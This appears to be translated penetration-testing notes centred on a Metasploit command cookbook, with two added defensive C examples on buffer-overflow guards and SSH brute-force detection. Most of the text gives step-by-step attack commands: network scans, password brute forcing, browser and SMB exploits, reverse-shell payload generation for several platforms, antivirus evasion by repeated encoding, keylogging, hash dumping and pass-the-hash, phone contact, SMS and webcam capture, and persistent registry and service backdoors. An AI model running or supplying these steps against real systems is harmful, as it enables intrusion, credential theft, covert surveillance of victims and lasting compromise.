A buffer overflow means supplying a buffer with more data than it has room to store, like pouring too much water into a cup.
A buffer can be understood more abstractly as a readable and writable region of memory;
the ultimate goal of a buffer overflow attack is to get the system to execute malicious code that has been deliberately placed in that readable and writable memory.
Defences against buffer overflows:
Use safe string-handling functions
Write secure code
Validate (filter) input data
Check pointer integrity
Defend with third-party software
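The first four defences above fit in one small C program. The following is an added example written for these notes, not code from the original page: it puts a fixed buffer next to a guard word and a function pointer (a constructed layout, with an assumed constant guard value where a real stack canary would be random), and shows an unchecked copy clobbering the guard versus a bounded, validated copy that rejects the same input. The integrity check refuses to call through the pointer once the guard has changed.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 16
#define GUARD_VALUE 0xDEADC0DEu   /* assumed guard constant; real canaries are random */

/* Constructed example layout: a fixed buffer followed by a guard word and a
 * function pointer, the kind of neighbours an overflow typically clobbers. */
struct record {
    char buf[BUF_LEN];
    uint32_t guard;
    void (*handler)(const char *);
};

static void default_handler(const char *s) { printf("handled: %s\n", s); }

void record_init(struct record *r) {
    memset(r->buf, 0, sizeof r->buf);
    r->guard = GUARD_VALUE;
    r->handler = default_handler;
}

/* Input validation (filtering): accept only printable ASCII. Returns 1 if acceptable. */
int validate_input(const char *s) {
    for (; *s != '\0'; s++)
        if (!isprint((unsigned char)*s)) return 0;
    return 1;
}

/* Safe string handling: a bounded copy that rejects oversize or malformed input
 * instead of overrunning the buffer or silently truncating. 0 = ok, -1 = rejected. */
int safe_copy(struct record *r, const char *src) {
    size_t n = strlen(src);
    if (!validate_input(src)) return -1;
    if (n >= sizeof r->buf) return -1;      /* keep room for the terminating NUL */
    memcpy(r->buf, src, n + 1);
    return 0;
}

/* The unchecked copy the notes warn about: it trusts the caller's length. To keep
 * the demo defined behaviour, writes are capped at the record's own storage, which
 * is still enough to overwrite the guard word and the pointer behind the buffer. */
void unchecked_copy(struct record *r, const char *src, size_t n) {
    if (n > sizeof *r) n = sizeof *r;
    memcpy((unsigned char *)r, src, n);
}

/* Pointer integrity check: the guard word sits between the buffer and the
 * pointer, so any overrun that reaches the pointer changes it. 1 = intact. */
int record_intact(const struct record *r) {
    return r->guard == GUARD_VALUE;
}

/* Only call through the handler when the guard is untouched. -1 = refused. */
int dispatch(struct record *r) {
    if (!record_intact(r)) return -1;
    r->handler(r->buf);
    return 0;
}

/* Scenario 1: oversize input through the unchecked copy. Returns dispatch()'s
 * result, so -1 means the overwrite was caught before the pointer was used. */
int demo_unchecked(void) {
    struct record r;
    char oversized[sizeof(struct record)];  /* constructed: 32 bytes of 'A' */
    record_init(&r);
    memset(oversized, 'A', sizeof oversized);
    unchecked_copy(&r, oversized, sizeof oversized);
    return dispatch(&r);
}

/* Scenario 2: the same oversize input through safe_copy. Returns 1 when the
 * copy was rejected and the record is still usable afterwards. */
int demo_safe(void) {
    struct record r;
    record_init(&r);
    int rc = safe_copy(&r, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
    return rc == -1 && record_intact(&r) && dispatch(&r) == 0;
}

int main(void) {
    printf("unchecked copy: dispatch returned %d\n", demo_unchecked());
    printf("safe copy: %s\n", demo_safe() ? "rejected, record intact" : "unexpected");
    return 0;
}
```

The guard check is a stand-in for what a compiler's stack protector does automatically; the point of the example is that the bounded copy removes the bug, while the integrity check only turns a silent control-flow hijack into a detected failure.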
Exploit
The process in which a tester attacks a system, program or service through one of its vulnerabilities
Payload
A piece of attack code executed on the target system; the code can open a reverse connection, create users, or run other system commands
shellcode
A sequence of machine instructions run on the target machine that returns a shell once it executes successfully
Module
A software code component used within the Metasploit framework
Listener
The Metasploit component that waits for an incoming network connection
Start the database: service postgresql start
Check the database status: service postgresql status
Run msfconsole
Check the database connection status: db_status
Create a workspace: workspace -a test
Delete a workspace: workspace -d test
Switch to the test workspace: workspace test
Scan hosts with nmap: db_nmap -sS 192.168.80.1
Export the scan results: db_export 1.xml
Import scan results: db_import 1.xml
View the scan results: hosts
Information gathering
Start msfconsole
use auxiliary/scanner/ip/ipidseq #IPID sequence scanner, similar to nmap's -sI -O options
show options
set RHOSTS 192.168.1.0/24
set RPORT 8080
set THREADS 50
run
nmap scan with the database connected
db_nmap -sS -A 192.168.2.123
db_services #view the scan results
Using the portscan module
search portscan
use auxiliary/scanner/portscan/syn
set RHOSTS 192.168.1.111
set THREADS 50
run
Targeted scan with the smb_version module:
use auxiliary/scanner/smb/smb_version #find hosts with port 445 open
show options
set RHOSTS 192.168.1.111
set THREADS 50
run
db_hosts -c address,os_flavor
Find MSSQL hosts
use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run
Search for e-mail addresses belonging to a domain
search search_email_collector
use auxiliary/gather/search_email_collector
set DOMAIN cracer.com (the domain to search)
run
SSH server scan
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run
Telnet service
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run
FTP host scan
use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
Scan for FTP anonymous login
use auxiliary/scanner/ftp/anonymous
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
FTP anonymous login
Username: anonymous
Password: (empty)
Find the live hosts on the local network
use auxiliary/scanner/discovery/arp_sweep
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
Scan website directories (this does not scan for files)
use auxiliary/scanner/http/dir_scanner
show options
set RHOSTS 192.168.1.129
set THREADS 50
run
Scan for SNMP hosts
use auxiliary/scanner/snmp/snmp_login
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run
Sniffing and packet capture
use auxiliary/sniffer/psnuffle
run
Password brute forcing
SSH password
search ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 192.168.2.231
set PASS_FILE pass
set USERNAME root
exploit
Telnet password
search telnet_login
use auxiliary/scanner/telnet/telnet_login
show options
set RHOSTS 192.168.2.123
set PASS_FILE pass
set USERNAME administrator
exploit
Samba attack
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.2.3
set PASS_FILE pass
set SMBUser administrator
set THREADS 50
exploit
MySQL password brute force
search mysql_login
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.1.32
set PASS_FILE pass
set USERNAME root
set THREADS 50
exploit
PostgreSQL password brute force
search postgres_login
use auxiliary/scanner/postgres/postgres_login
show options
set RHOSTS 192.168.2.129
set PASS_FILE pass
set USERNAME postgres
exploit
Tomcat attack
search tomcat_mgr_login
use auxiliary/scanner/http/tomcat_mgr_login
show options
set RHOSTS 192.168.1.23
set PASS_FILE /root/pass.txt
set USER_FILE /root/user.txt
exploit
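Every one of the login scanners above produces the same thing on the target side: a burst of failed logins from one source address. As an added example (not part of the original notes), here is the detection logic a defender would run over the SSH server's authentication log. The log lines are constructed sshd-style syslog entries, the source address reuses the RHOSTS value from the ssh_login section only to tie the two views together, and the threshold of five failures is an assumed policy value.

```c
#include <stdio.h>
#include <string.h>

#define MAX_SOURCES 64
#define FAIL_THRESHOLD 5   /* assumed policy: flag a source after this many failures */
#define IP_LEN 46          /* room for an IPv6 address plus the terminating NUL */

/* Constructed sshd log lines in the usual syslog shape. Not real log data. */
static const char *SAMPLE_LOG[] = {
    "Jan 10 10:00:01 srv sshd[2311]: Failed password for root from 192.168.2.231 port 51002 ssh2",
    "Jan 10 10:00:02 srv sshd[2312]: Failed password for root from 192.168.2.231 port 51003 ssh2",
    "Jan 10 10:00:02 srv sshd[2313]: Failed password for invalid user admin from 192.168.2.231 port 51004 ssh2",
    "Jan 10 10:00:03 srv sshd[2314]: Failed password for root from 192.168.2.231 port 51005 ssh2",
    "Jan 10 10:00:05 srv sshd[2320]: Accepted publickey for alice from 10.0.0.7 port 40001 ssh2",
    "Jan 10 10:00:06 srv sshd[2315]: Failed password for root from 192.168.2.231 port 51006 ssh2",
    "Jan 10 10:00:09 srv sshd[2330]: Failed password for bob from 10.0.0.9 port 40111 ssh2",
    "Jan 10 10:00:10 srv sshd[2316]: Failed password for root from 192.168.2.231 port 51007 ssh2",
};
#define SAMPLE_COUNT (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

struct source { char ip[IP_LEN]; int failures; };

/* Extract the source address from a "Failed password ... from <ip> port" line.
 * Returns 1 and fills ip for a failed-login line, 0 for anything else. */
int parse_failed_login(const char *line, char *ip, size_t iplen) {
    const char *p = strstr(line, "Failed password for ");
    if (p == NULL) return 0;
    p = strstr(p, " from ");
    if (p == NULL) return 0;
    p += strlen(" from ");
    size_t n = strcspn(p, " ");
    if (n == 0 || n >= iplen) return 0;
    memcpy(ip, p, n);
    ip[n] = '\0';
    return 1;
}

/* Tally failures per source address. Returns the number of distinct sources seen. */
int count_failures(const char **lines, size_t nlines, struct source *table, int cap) {
    int used = 0;
    char ip[IP_LEN];
    for (size_t i = 0; i < nlines; i++) {
        if (!parse_failed_login(lines[i], ip, sizeof ip)) continue;
        int j;
        for (j = 0; j < used; j++)
            if (strcmp(table[j].ip, ip) == 0) break;
        if (j == used) {
            if (used == cap) continue;  /* table full; a real tool would evict the oldest */
            snprintf(table[used].ip, IP_LEN, "%s", ip);
            table[used].failures = 0;
            used++;
        }
        table[j].failures++;
    }
    return used;
}

/* Number of sources at or above the threshold; the first one is copied to first_ip. */
int flag_bruteforce(const char **lines, size_t nlines, char *first_ip, size_t iplen) {
    struct source table[MAX_SOURCES];
    int n = count_failures(lines, nlines, table, MAX_SOURCES);
    int flagged = 0;
    for (int i = 0; i < n; i++) {
        if (table[i].failures < FAIL_THRESHOLD) continue;
        if (flagged == 0 && first_ip != NULL) snprintf(first_ip, iplen, "%s", table[i].ip);
        flagged++;
    }
    return flagged;
}

/* Helpers over the constructed sample so results can be checked without any I/O. */
int sample_flagged_count(void) { return flag_bruteforce(SAMPLE_LOG, SAMPLE_COUNT, NULL, 0); }
int sample_flagged_is(const char *expect) {
    char ip[IP_LEN] = "";
    flag_bruteforce(SAMPLE_LOG, SAMPLE_COUNT, ip, sizeof ip);
    return strcmp(ip, expect) == 0;
}
int sample_failures_from(const char *addr) {
    struct source table[MAX_SOURCES];
    int n = count_failures(SAMPLE_LOG, SAMPLE_COUNT, table, MAX_SOURCES);
    for (int i = 0; i < n; i++)
        if (strcmp(table[i].ip, addr) == 0) return table[i].failures;
    return 0;
}

int main(void) {
    char ip[IP_LEN] = "";
    int n = flag_bruteforce(SAMPLE_LOG, SAMPLE_COUNT, ip, sizeof ip);
    printf("%d source(s) over threshold; first: %s\n", n, ip);
    return 0;
}
```

A single failed login from 10.0.0.9 stays below the threshold, so only the scanning source is reported; in production the same tally would be kept per time window and fed to a blocklist or an alert rather than printed.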
Exploit modules
show targets #list the targets (OS versions)
set TARGET #set the target version
exploit #launch the exploit
sessions -l #list sessions
sessions -i #select a session
sessions -k #kill a session
z #put the session in the background
c #end the session
show auxiliary #list the auxiliary modules
use #use an auxiliary module
set #set an option
run #run the module
ms10_002
search ms10_002
use exploit/windows/browser/ms10_002_aurora
show options
set SRVHOST 192.168.2.128 (the IP that serves the malicious URL; can be proxied)
set payload windows/meterpreter/reverse_tcp (reverse shell)
set SRVPORT 80 (port of the served URL)
set URIPATH /
set LHOST 192.168.2.128 (address to listen on)
set LPORT 1211 (port to listen on)
exploit
sessions -l (check whether a session exists)
sessions -i 1 (pick an ID and enter that session)
Type shell to get a system shell
ms10_018
search ms10_018
use exploit/windows/browser/ms10_018_ie_behaviors
show options
set SRVHOST 192.168.2.128
set SRVPORT 8081
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1211
exploit
sessions -l (check whether a session exists)
sessions -i 1 (pick an ID and enter that session)
Because the payload is different, this one drops straight into a shell
ms12_020
search ms12_020
use auxiliary/scanner/rdp/ms12_020_check (check whether the ms12_020 vulnerability is present)
show options
set RHOSTS 192.168.2.0/24
set THREADS 50
run
back
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
set RHOST 192.168.2.132
run
ms10_046
search ms10_046
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show options
set SRVHOST 192.168.2.128
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1213
exploit
ms08_067
search ms08_067
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.2.131
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1215
show targets
set target 34
exploit
shellcode
windows
Generate the shellcode
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1121 X > /root/cracer.exe
Listen for the shellcode
msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (must match the address used when generating)
set LPORT 1121
Upload the generated shellcode to the target machine
exploit
linux
Generate the shellcode
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1121 X > /root/cracer
Listen for the shellcode
msf
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (must match the address used when generating)
set LPORT 1121
Upload the generated shellcode to the target machine
exploit
android
Generate the shellcode
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1121 X > /root/Desktop/cracer.apk
Listen for the shellcode
msf
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (must match the address used when generating)
set LPORT 1121
Upload the generated shellcode to the target machine
exploit
dump_contacts #export the contacts
dump_sms #export the text messages
webcam_list #number of cameras
webcam_snap -i 1 #take a photo (1 = rear camera)
webcam_stream #start the camera
java
Generate the shellcode
msfpayload java/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1125 X > /root/Desktop/cracer.jar
Listen for the shellcode
msf
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (must match the address used when generating)
set LPORT 1125
Upload the generated shellcode to the target machine
exploit
Run the generated cracer.jar: java -jar cracer.jar
php
Generate the shellcode
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1121 R > cracer.php
Listen for the shellcode
msf
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.2.133 (must match the address used when generating)
set LPORT 1121
Upload the generated shellcode to the target machine
exploit
Shellcode AV evasion
Evasion through multiple encoding passes
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /root/cc.exe
Evasion by packing
upx -5 cc.exe
Evasion with Veil
Shellter evasion tool
Shellcode injection tools
Inject a backdoor into an otherwise legitimate program to evade detection
Post-exploitation
1. Generate a trojan
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1121 X > /root/cracer.exe
2. Start listening
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133
set LPORT 1233
exploit
Run the trojan on the target machine
Screenshot: screenshot (the image is saved in the home directory)
Get the platform the system runs on: sysinfo
Capture keystrokes
keyscan_start #start
keyscan_dump #output
keyscan_stop #stop
ps #list processes
migrate 1774 #migrate to another process (the first thing to do after successfully getting onto the target is to migrate into a stable process, so that control is kept even if the original program is closed)
run post/windows/capture/keylog_recorder #record keystrokes
Get the hashes: hashdump
Log in with the hash
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133
set RHOST 192.168.2.131 (the target)
show options
set LPORT 1212
set SMBUser administrator (the SMBUser and SMBPass values both come from the hashdump output)
set SMBPass asdasdqwsda1313
show options
exploit
Process migration: run post/windows/manage/migrate (migrates to a stable process automatically)
run killav #close cmd.exe
View all of the target's traffic: run packetrecorder -i 1
Extract system information: run scraper
Persistent control of the PC (autostart on boot)
run persistence -X -i 50 -p 1121 -r 192.168.2.133 (writes entries into the target's registry)
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 1121
set LHOST 192.168.2.133
exploit
sessions -u 2 #upgrade a shell session to meterpreter
Permanent control of a server
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1127 X > /root/cracer.exe
Place the generated payload on the target machine
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 1127 (must match the LPORT used when generating the payload)
set LHOST 192.168.2.133
exploit
Run the payload
run metsvc -A //install the permanent backdoor
After a reboot
msfconsole
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set RHOST 192.168.2.132
set LPORT 31337 //fixed port
exploit